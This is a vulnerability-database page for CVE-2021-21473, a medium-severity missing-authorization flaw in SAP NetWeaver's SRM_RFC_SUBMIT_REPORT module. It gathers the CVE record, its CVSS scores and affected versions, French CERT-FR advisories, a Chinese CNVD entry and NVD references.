Vulnerability-Lookup

CVE-2021-21473 (GCVE-0-2021-21473)

Vulnerability from cvelistv5 – Published: 2021-06-09 13:23 – Updated: 2024-08-03 18:16

Summary

Severity

6.3 (Medium)


                        
                          CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

CWE

Missing Authorization

Assigner

sap

References

4 references

URL	Tags
https://wiki.scn.sap.com/wiki/pages/viewpage.acti…	x_refsource_MISC
https://launchpad.support.sap.com/#/notes/3002517	x_refsource_MISC
http://seclists.org/fulldisclosure/2022/May/42	mailing-listx_refsource_FULLDISC
http://packetstormsecurity.com/files/167229/SAP-A…	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
SAP SE	SAP NetWeaver AS ABAP and ABAP Platform (SRM_RFC_SUBMIT_REPORT)	Affected: < 700 Affected: < 702 Affected: < 710 Affected: < 711 Affected: < 730 Affected: < 731 Affected: < 740 Affected: < 750 Affected: < 751 Affected: < 752 Affected: < 753 Affected: < 754 Affected: < 755

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T18:16:22.654Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=578125999"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://launchpad.support.sap.com/#/notes/3002517"
          },
          {
            "name": "20220518 SEC Consult SA-20220518-0 :: Multiple Critical Vulnerabilities in SAP Application Server, ABAP and ABAP Platform (Different Software Components)",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "http://seclists.org/fulldisclosure/2022/May/42"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/167229/SAP-Application-Server-ABAP-ABAP-Platform-Code-Injection-SQL-Injection-Missing-Authorization.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "SAP NetWeaver AS ABAP and ABAP Platform (SRM_RFC_SUBMIT_REPORT)",
          "vendor": "SAP SE",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 700"
            },
            {
              "status": "affected",
              "version": "\u003c 702"
            },
            {
              "status": "affected",
              "version": "\u003c 710"
            },
            {
              "status": "affected",
              "version": "\u003c 711"
            },
            {
              "status": "affected",
              "version": "\u003c 730"
            },
            {
              "status": "affected",
              "version": "\u003c 731"
            },
            {
              "status": "affected",
              "version": "\u003c 740"
            },
            {
              "status": "affected",
              "version": "\u003c 750"
            },
            {
              "status": "affected",
              "version": "\u003c 751"
            },
            {
              "status": "affected",
              "version": "\u003c 752"
            },
            {
              "status": "affected",
              "version": "\u003c 753"
            },
            {
              "status": "affected",
              "version": "\u003c 754"
            },
            {
              "status": "affected",
              "version": "\u003c 755"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "SAP NetWeaver AS ABAP and ABAP Platform, versions - 700, 702, 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755, contains function module SRM_RFC_SUBMIT_REPORT which fails to validate authorization of an authenticated user thus allowing an unauthorized user to execute reports in SAP NetWeaver ABAP Platform."
        }
      ],
      "metrics": [
        {
          "cvssV3_0": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
            "version": "3.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "Missing Authorization",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-05-19T17:06:25.000Z",
        "orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
        "shortName": "sap"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=578125999"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://launchpad.support.sap.com/#/notes/3002517"
        },
        {
          "name": "20220518 SEC Consult SA-20220518-0 :: Multiple Critical Vulnerabilities in SAP Application Server, ABAP and ABAP Platform (Different Software Components)",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "http://seclists.org/fulldisclosure/2022/May/42"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/167229/SAP-Application-Server-ABAP-ABAP-Platform-Code-Injection-SQL-Injection-Missing-Authorization.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cna@sap.com",
          "ID": "CVE-2021-21473",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "SAP NetWeaver AS ABAP and ABAP Platform (SRM_RFC_SUBMIT_REPORT)",
                      "version": {
                        "version_data": [
                          {
                            "version_name": "\u003c",
                            "version_value": "700"
                          },
                          {
                            "version_name": "\u003c",
                            "version_value": "702"
                          },
                          {
                            "version_name": "\u003c",
                            "version_value": "710"
                          },
                          {
                            "version_name": "\u003c",
                            "version_value": "711"
                          },
                          {
                            "version_name": "\u003c",
                            "version_value": "730"
                          },
                          {
                            "version_name": "\u003c",
                            "version_value": "731"
                          },
                          {
                            "version_name": "\u003c",
                            "version_value": "740"
                          },
                          {
                            "version_name": "\u003c",
                            "version_value": "750"
                          },
                          {
                            "version_name": "\u003c",
                            "version_value": "751"
                          },
                          {
                            "version_name": "\u003c",
                            "version_value": "752"
                          },
                          {
                            "version_name": "\u003c",
                            "version_value": "753"
                          },
                          {
                            "version_name": "\u003c",
                            "version_value": "754"
                          },
                          {
                            "version_name": "\u003c",
                            "version_value": "755"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "SAP SE"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "SAP NetWeaver AS ABAP and ABAP Platform, versions - 700, 702, 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755, contains function module SRM_RFC_SUBMIT_REPORT which fails to validate authorization of an authenticated user thus allowing an unauthorized user to execute reports in SAP NetWeaver ABAP Platform."
            }
          ]
        },
        "impact": {
          "cvss": {
            "baseScore": "6.3",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
            "version": "3.0"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "Missing Authorization"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=578125999",
              "refsource": "MISC",
              "url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=578125999"
            },
            {
              "name": "https://launchpad.support.sap.com/#/notes/3002517",
              "refsource": "MISC",
              "url": "https://launchpad.support.sap.com/#/notes/3002517"
            },
            {
              "name": "20220518 SEC Consult SA-20220518-0 :: Multiple Critical Vulnerabilities in SAP Application Server, ABAP and ABAP Platform (Different Software Components)",
              "refsource": "FULLDISC",
              "url": "http://seclists.org/fulldisclosure/2022/May/42"
            },
            {
              "name": "http://packetstormsecurity.com/files/167229/SAP-Application-Server-ABAP-ABAP-Platform-Code-Injection-SQL-Injection-Missing-Authorization.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/167229/SAP-Application-Server-ABAP-ABAP-Platform-Code-Injection-SQL-Injection-Missing-Authorization.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
    "assignerShortName": "sap",
    "cveId": "CVE-2021-21473",
    "datePublished": "2021-06-09T13:23:48.000Z",
    "dateReserved": "2020-12-30T00:00:00.000Z",
    "dateUpdated": "2024-08-03T18:16:22.654Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2021-21473",
      "date": "2026-06-11",
      "epss": "0.00475",
      "percentile": "0.65266"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2021-21473\",\"sourceIdentifier\":\"cna@sap.com\",\"published\":\"2021-06-09T14:15:07.977\",\"lastModified\":\"2024-11-21T05:48:26.590\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"SAP NetWeaver AS ABAP and ABAP Platform, versions - 700, 702, 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755, contains function module SRM_RFC_SUBMIT_REPORT which fails to validate authorization of an authenticated user thus allowing an unauthorized user to execute reports in SAP NetWeaver ABAP Platform.\"},{\"lang\":\"es\",\"value\":\"SAP NetWeaver AS ABAP y ABAP Platform, versiones - 700, 702, 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755, contiene el m\u00f3dulo de funci\u00f3n SRM_RFC_SUBMIT_REPORT que no comprueba la autorizaci\u00f3n de un usuario autenticado por lo tanto permitir a un usuario no autorizado ejecutar reportes en la plataforma SAP NetWeaver ABAP\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L\",\"baseScore\":6.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":2.8,\"impactScore\":3.4}],\"cvssMetricV30\":[{\"source\":\"cna@sap.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.0\",\"vectorString\":\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L\",\"baseScore\":6.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":2.8,\"impactScore\":3.4}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:L/Au:S/C:P/I:P/A:P\",\"baseScore\":6.5,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"LOW\",\"authentication\":\"SINGLE\",\"confidentialityImpact\":\"PARTIAL\",\"integrityImpact\":\"PARTIAL\",\"availabilityImpact\":\"PARTIAL\"},\"baseSeverity\":\"MEDIUM\",\"exploitabilityScore\":8.0,\"impactScore\":6.4,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-862\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sap:netweaver_application_server_abap:700:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"C5A3C915-0E5F-4B1A-B1EB-5ADEA517F620\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sap:netweaver_application_server_abap:702:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"706FEB9E-3EE9-405E-A8C9-733DAF68AC6D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sap:netweaver_application_server_abap:710:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"9B5BF1EC-C2A6-486B-8E63-0A7ED431C1F0\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sap:netweaver_application_server_abap:711:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"17847B21-8BE6-4359-913B-B6592D37C655\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sap:netweaver_application_server_abap:730:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2F1B47E4-C4E3-4D79-9048-EF6A82B8085E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sap:netweaver_application_server_abap:731:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"5CC29738-CF17-4E6B-9C9E-879B17F7E001\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sap:netweaver_application_server_abap:740:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"127E508F-6CC1-41C8-96DF-8D14FFDD4020\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sap:netweaver_application_server_abap:750:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"7777AA80-1608-420E-B7D5-09ABECD51728\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sap:netweaver_application_server_abap:751:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"0539618A-1C4D-463F-B2BB-DD1C239C23EB\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sap:netweaver_application_server_abap:752:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"62828DCD-F80E-4C7C-A988-EFEA06A5223E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sap:netweaver_application_server_abap:753:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"D9F38585-73AE-4DBB-A978-F0272DF8FB58\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sap:netweaver_application_server_abap:754:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"D416C064-BB8A-4230-A761-84A93E017F79\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sap:netweaver_application_server_abap:755:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"6B8D3EA0-28E6-4333-8C67-B9D3775EB9BC\"}]}]}],\"references\":[{\"url\":\"http://packetstormsecurity.com/files/167229/SAP-Application-Server-ABAP-ABAP-Platform-Code-Injection-SQL-Injection-Missing-Authorization.html\",\"source\":\"cna@sap.com\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://seclists.org/fulldisclosure/2022/May/42\",\"source\":\"cna@sap.com\",\"tags\":[\"Exploit\",\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"https://launchpad.support.sap.com/#/notes/3002517\",\"source\":\"cna@sap.com\",\"tags\":[\"Permissions Required\",\"Vendor Advisory\"]},{\"url\":\"https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=578125999\",\"source\":\"cna@sap.com\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"http://packetstormsecurity.com/files/167229/SAP-Application-Server-ABAP-ABAP-Platform-Code-Injection-SQL-Injection-Missing-Authorization.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://seclists.org/fulldisclosure/2022/May/42\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"https://launchpad.support.sap.com/#/notes/3002517\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Permissions Required\",\"Vendor Advisory\"]},{\"url\":\"https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=578125999\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Vendor Advisory\"]}]}}"
  }
}

CERTFR-2021-AVI-440

Vulnerability from certfr_avis - Published: 2021-06-08 - Updated: 2021-06-08

De multiples vulnérabilités ont été découvertes dans les produits SAP. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un contournement de la politique de sécurité et une élévation de privilèges.

Solution

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

None

Impacted products

Vendor	Product	Description
SAP	N/A	SAP NetWeaver AS for ABAP (RFC Gateway) versions KRNL32NUC - 7.22, 7.22EXT, KRNL64NUC - 7.22, 7.22EXT, 7.49, KRNL64UC - 8.04, 7.22, 7.22EXT, 7.49, 7.53, 7.73, KERNEL - 7.22, 8.04, 7.49, 7.53, 7.73, 7.77, 7.81, 7.82 et 7.83
SAP	N/A	SAP NetWeaver Application Server ABAP (Applications based on SAP GUI for HTML) versions KRNL64NUC - 7.49, KRNL64UC - 7.49, 7.53, KERNEL - 7.49, 7.53, 7.77, 7.81 et 7.84
SAP	N/A	SAP NetWeaver AS ABAP et ABAP Platform (SRM_RFC_SUBMIT_REPORT) versions 700, 702, 710, 711, 730, 731, 740, 750, 751, 752, 753, 754 et 755
SAP	N/A	SAP NetWeaver AS ABAP versions KRNL32NUC - 7.22, 7.22EXT, KRNL32UC - 7.22, 7.22EXT, KRNL64NUC - 7.22, 7.22EXT, 7.49, KRNL64UC - 8.04, 7.22, 7.22EXT, 7.49, 7.53, 7.73, KERNEL - 7.22, 8.04, 7.49, 7.53, 7.73, 7.77, 7.81, 7.82, 7.83 et 7.84
SAP	N/A	SAP NetWeaver AS for ABAP (Web Survey) versions 700, 702, 710, 711, 730, 731, 750, 750, 752, 75A et 75F
SAP	N/A	SAP NetWeaver Application Server ABAP (Applications based on Web Dynpro ABAP) versions SAP_UI – 750, 752, 753, 754, 755, SAP_BASIS – 702, 31
SAP	N/A	SAP NetWeaver AS ABAP and ABAP Platform versions 700, 701, 702, 731, 740, 750, 751, 752, 753, 754, 755 et 804
SAP	N/A	SAP NetWeaver ABAP Server et ABAP Platform (Enqueue Server) versions KRNL32NUC - 7.22, 7.22EXT, KRNL64NUC - 7.22, 7.22EXT, 7.49, KRNL64UC - 8.04, 7.22, 7.22EXT, 7.49, 7.53, 7.73, KERNEL - 7.22, 8.04, 7.49, 7.53 et 7.73
SAP	N/A	SAP Business One version 10.0
SAP	Commerce Cloud	SAP Commerce Cloud version 100
SAP	N/A	SAP 3D Visual Enterprise Viewer version 9
SAP	N/A	SAP Commerce versions 1808, 1811, 1905, 2005 et 2011
SAP	N/A	SAP Fiori Apps 2.0 for Travel Management in SAP ERP version 608
SAP	N/A	SAP NetWeaver AS for Java (UserAdmin) versions 7.11,7.20,7.30,7.31,7.40 et 7.50
SAP	N/A	SAP NetWeaver AS for JAVA versions 7.20, 7.30, 7.31, 7.40 et 7.50
SAP	N/A	SAP Manufacturing Execution versions 15.1, 1.5.2, 15.3 et 15.4
SAP	N/A	SAP NetWeaver ABAP Server et ABAP Platform (Dispatcher) versions KRNL32NUC - 7.22, 7.22EXT, KRNL32UC - 7.22, 7.22EXT, KRNL64NUC - 7.22, 7.22EXT, 7.49, KRNL64UC - 8.04, 7.22, 7.22EXT, 7.49, 7.53, 7.73, KERNEL - 7.22, 8.04, 7.49, 7.53, 7.73, 7.77, 7.81, 7.82 et 7.83
SAP	N/A	SAP Enable Now (SAP Workforce Performance Builder - Manager) versions 10.0 et 1.0
SAP	N/A	SAP NetWeaver AS (Internet Graphics Server – Portwatcher) versions 7.20, 7.20EXT, 7.53, 7.20_EX2 et 7.81

References

Title

Publication Time

CERTFR-2021-AVI-607

Vulnerability from certfr_avis - Published: 2021-08-10 - Updated: 2021-08-10

De multiples vulnérabilités ont été découvertes dans les produits SAP. Certaines d'entre elles permettent à un attaquant de provoquer un problème de sécurité non spécifié par l'éditeur, une exécution de code arbitraire à distance et un contournement de la politique de sécurité.

Solution

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

None

Impacted products

Vendor	Product	Description
SAP	SAP BusinessObjects Business Intelligence	SAP BusinessObjects Business Intelligence Platform (SAPUI5) versions 420 et 430
SAP	N/A	SAP NetWeaver Development Infrastructure (Notification Service) versions 7.31, 7.40 et 7.50
SAP	N/A	SAP NetWeaver Development Infrastructure (Component Build Service) versions 7.11, 7.20, 7.30, 7.31, 7.40 et 7.50
SAP	N/A	SAP NetWeaver (Knowledge Management) versions 7.30, 7.31, 7.40 et 7.50
SAP	N/A	SAP Cloud Connector version 2.0
SAP	N/A	SAP Business One version 10.0
SAP	SAP BusinessObjects Business Intelligence	SAP BusinessObjects Business Intelligence Platform (Crystal Report) versions 420 et 430
SAP	NetWeaver Enterprise Portal	SAP NetWeaver Enterprise Portal versions 7.10, 7.11, 7.20, 7.30, 7.31, 7.40 et 7.50
SAP	N/A	SAP Fiori Client Native Mobile pour Android version 3.2
SAP	N/A	DMIS Mobile Plug-In versions DMIS 2011_1_620, 2011_1_640, 2011_1_700, 2011_1_710, 2011_1_730, 710, 2011_1_731, 710, 2011_1_752 et 2020
SAP	N/A	SAP NetWeaver AS ABAP and ABAP Platform (SRM_RFC_SUBMIT_REPORT) versions 700, 702, 710, 711, 730, 731, 740, 750, 751, 752, 753, 754 et 755
SAP	N/A	SAP S/4HANA versions SAPSCORE 125, S4CORE 102, 102, 103, 104 et 105
SAP	NetWeaver Enterprise Portal	SAP NetWeaver Enterprise Portal (Application Extensions) versions 7.30, 7.31, 7.40 et 7.50

References

Title

Publication Time

CNVD-2021-47712

Vulnerability from cnvd - Published: 2021-07-06

Title

SAP NetWeaver AS ABAP and ABAP Platform授权问题漏洞

Description

SAP Netweaver是德国思爱普（SAP）公司的一套面向服务的集成化应用平台。该平台主要为SAP应用程序提供开发和运行环境。 SAP NetWeaver AS ABAP and ABAP Platform存在授权问题漏洞，该漏洞源于程序未正确验证用户授权，未经身份认证的攻击者可利用该漏洞执行报告。

Severity

中

Patch Name

SAP NetWeaver AS ABAP and ABAP Platform授权问题漏洞的补丁

Patch Description

SAP Netweaver是德国思爱普（SAP）公司的一套面向服务的集成化应用平台。该平台主要为SAP应用程序提供开发和运行环境。 SAP NetWeaver AS ABAP and ABAP Platform存在授权问题漏洞，该漏洞源于程序未正确验证用户授权，未经身份认证的攻击者可利用该漏洞执行报告。目前，供应商发布了安全公告及相关补丁信息，修复了此漏洞。

Formal description

厂商已发布了漏洞修复程序，请及时关注更新： https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=578125999

Reference

https://nvd.nist.gov/vuln/detail/CVE-2021-21473

Impacted products

Name
['SAP NetWeaver AS ABAP and ABAP Platform 754', 'SAP NetWeaver AS ABAP and ABAP Platform 702', 'SAP NetWeaver AS ABAP and ABAP Platform 753', 'SAP NetWeaver AS ABAP and ABAP Platform 750', 'SAP NetWeaver AS ABAP and ABAP Platform 711', 'SAP NetWeaver AS ABAP and ABAP Platform 700', 'SAP NetWeaver AS ABAP and ABAP Platform 752', 'SAP NetWeaver AS ABAP and ABAP Platform 755', 'SAP NetWeaver AS ABAP and ABAP Platform 710', 'SAP NetWeaver AS ABAP and ABAP Platform 751', 'SAP NetWeaver AS ABAP and ABAP Platform 730', 'SAP NetWeaver AS ABAP and ABAP Platform 740', 'SAP NetWeaver AS ABAP and ABAP Platform 731']

Name

['SAP NetWeaver AS ABAP and ABAP Platform 754', 'SAP NetWeaver AS ABAP and ABAP Platform 702', 'SAP NetWeaver AS ABAP and ABAP Platform 753', 'SAP NetWeaver AS ABAP and ABAP Platform 750', 'SAP NetWeaver AS ABAP and ABAP Platform 711', 'SAP NetWeaver AS ABAP and ABAP Platform 700', 'SAP NetWeaver AS ABAP and ABAP Platform 752', 'SAP NetWeaver AS ABAP and ABAP Platform 755', 'SAP NetWeaver AS ABAP and ABAP Platform 710', 'SAP NetWeaver AS ABAP and ABAP Platform 751', 'SAP NetWeaver AS ABAP and ABAP Platform 730', 'SAP NetWeaver AS ABAP and ABAP Platform 740', 'SAP NetWeaver AS ABAP and ABAP Platform 731']

Show details on source website

JSON

To clipboard

{
  "cves": {
    "cve": {
      "cveNumber": "CVE-2021-21473",
      "cveUrl": "https://nvd.nist.gov/vuln/detail/CVE-2021-21473"
    }
  },
  "description": "SAP Netweaver\u662f\u5fb7\u56fd\u601d\u7231\u666e\uff08SAP\uff09\u516c\u53f8\u7684\u4e00\u5957\u9762\u5411\u670d\u52a1\u7684\u96c6\u6210\u5316\u5e94\u7528\u5e73\u53f0\u3002\u8be5\u5e73\u53f0\u4e3b\u8981\u4e3aSAP\u5e94\u7528\u7a0b\u5e8f\u63d0\u4f9b\u5f00\u53d1\u548c\u8fd0\u884c\u73af\u5883\u3002\n\nSAP NetWeaver AS ABAP and ABAP Platform\u5b58\u5728\u6388\u6743\u95ee\u9898\u6f0f\u6d1e\uff0c\u8be5\u6f0f\u6d1e\u6e90\u4e8e\u7a0b\u5e8f\u672a\u6b63\u786e\u9a8c\u8bc1\u7528\u6237\u6388\u6743\uff0c\u672a\u7ecf\u8eab\u4efd\u8ba4\u8bc1\u7684\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u6267\u884c\u62a5\u544a\u3002",
  "formalWay": "\u5382\u5546\u5df2\u53d1\u5e03\u4e86\u6f0f\u6d1e\u4fee\u590d\u7a0b\u5e8f\uff0c\u8bf7\u53ca\u65f6\u5173\u6ce8\u66f4\u65b0\uff1a\r\nhttps://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=578125999",
  "isEvent": "\u901a\u7528\u8f6f\u786c\u4ef6\u6f0f\u6d1e",
  "number": "CNVD-2021-47712",
  "openTime": "2021-07-06",
  "patchDescription": "SAP Netweaver\u662f\u5fb7\u56fd\u601d\u7231\u666e\uff08SAP\uff09\u516c\u53f8\u7684\u4e00\u5957\u9762\u5411\u670d\u52a1\u7684\u96c6\u6210\u5316\u5e94\u7528\u5e73\u53f0\u3002\u8be5\u5e73\u53f0\u4e3b\u8981\u4e3aSAP\u5e94\u7528\u7a0b\u5e8f\u63d0\u4f9b\u5f00\u53d1\u548c\u8fd0\u884c\u73af\u5883\u3002\r\n\r\nSAP NetWeaver AS ABAP and ABAP Platform\u5b58\u5728\u6388\u6743\u95ee\u9898\u6f0f\u6d1e\uff0c\u8be5\u6f0f\u6d1e\u6e90\u4e8e\u7a0b\u5e8f\u672a\u6b63\u786e\u9a8c\u8bc1\u7528\u6237\u6388\u6743\uff0c\u672a\u7ecf\u8eab\u4efd\u8ba4\u8bc1\u7684\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u6267\u884c\u62a5\u544a\u3002\u76ee\u524d\uff0c\u4f9b\u5e94\u5546\u53d1\u5e03\u4e86\u5b89\u5168\u516c\u544a\u53ca\u76f8\u5173\u8865\u4e01\u4fe1\u606f\uff0c\u4fee\u590d\u4e86\u6b64\u6f0f\u6d1e\u3002",
  "patchName": "SAP NetWeaver AS ABAP and ABAP Platform\u6388\u6743\u95ee\u9898\u6f0f\u6d1e\u7684\u8865\u4e01",
  "products": {
    "product": [
      "SAP NetWeaver AS ABAP and ABAP Platform 754",
      "SAP NetWeaver AS ABAP and ABAP Platform 702",
      "SAP NetWeaver AS ABAP and ABAP Platform 753",
      "SAP NetWeaver AS ABAP and ABAP Platform 750",
      "SAP NetWeaver AS ABAP and ABAP Platform 711",
      "SAP NetWeaver AS ABAP and ABAP Platform 700",
      "SAP NetWeaver AS ABAP and ABAP Platform 752",
      "SAP NetWeaver AS ABAP and ABAP Platform 755",
      "SAP NetWeaver AS ABAP and ABAP Platform 710",
      "SAP NetWeaver AS ABAP and ABAP Platform 751",
      "SAP NetWeaver AS ABAP and ABAP Platform 730",
      "SAP NetWeaver AS ABAP and ABAP Platform 740",
      "SAP NetWeaver AS ABAP and ABAP Platform 731"
    ]
  },
  "referenceLink": "https://nvd.nist.gov/vuln/detail/CVE-2021-21473",
  "serverity": "\u4e2d",
  "submitTime": "2021-06-11",
  "title": "SAP NetWeaver AS ABAP and ABAP Platform\u6388\u6743\u95ee\u9898\u6f0f\u6d1e"
}

FKIE_CVE-2021-21473

Vulnerability from fkie_nvd - Published: 2021-06-09 14:15 - Updated: 2024-11-21 05:48

Severity

6.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Summary

References

URL	Tags
cna@sap.com	http://packetstormsecurity.com/files/167229/SAP-Application-Server-ABAP-ABAP-Platform-Code-Injection-SQL-Injection-Missing-Authorization.html	Exploit, Third Party Advisory, VDB Entry
cna@sap.com	http://seclists.org/fulldisclosure/2022/May/42	Exploit, Mailing List, Third Party Advisory
cna@sap.com	https://launchpad.support.sap.com/#/notes/3002517	Permissions Required, Vendor Advisory
cna@sap.com	https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=578125999	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/167229/SAP-Application-Server-ABAP-ABAP-Platform-Code-Injection-SQL-Injection-Missing-Authorization.html	Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://seclists.org/fulldisclosure/2022/May/42	Exploit, Mailing List, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://launchpad.support.sap.com/#/notes/3002517	Permissions Required, Vendor Advisory
